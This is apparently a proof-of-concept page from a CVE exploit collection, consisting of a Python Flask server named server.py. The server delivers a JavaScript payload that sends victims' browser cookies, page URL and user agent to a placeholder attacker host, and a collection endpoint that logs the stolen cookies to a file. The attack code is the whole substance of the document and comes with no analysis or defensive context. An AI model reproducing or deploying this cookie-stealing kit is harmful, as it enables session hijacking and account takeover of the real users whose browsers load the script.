4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / server.py PY
from flask import Flask, request, jsonify
from flask_cors import CORS
import datetime

app = Flask(__name__)
CORS(app)

@app.route('/cookie.js')
def serve_js():
    return """
    fetch('http://YOUR-IP/steal.php', {
        method: 'POST',
        body: JSON.stringify({
            cookies: document.cookie,
            page: window.location.href,
            userAgent: navigator.userAgent
        }),
        headers: { 'Content-Type': 'application/json' }
    });
    """

@app.route('/steal.php', methods=['POST', 'OPTIONS'])
def steal_cookies():
    if request.method == 'OPTIONS':
        return jsonify({"status": "ok"}), 200
    else:
        data = request.json
        with open("stolen_cookies.txt", "a") as f:
            f.write(f"""
            Time: {datetime.datetime.now()}
            Cookies: {data['cookies']}
            Page: {data['page']}
            User-Agent: {data['userAgent']}
            --------------------------
            """)
        return jsonify({"status": "success"}), 200

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)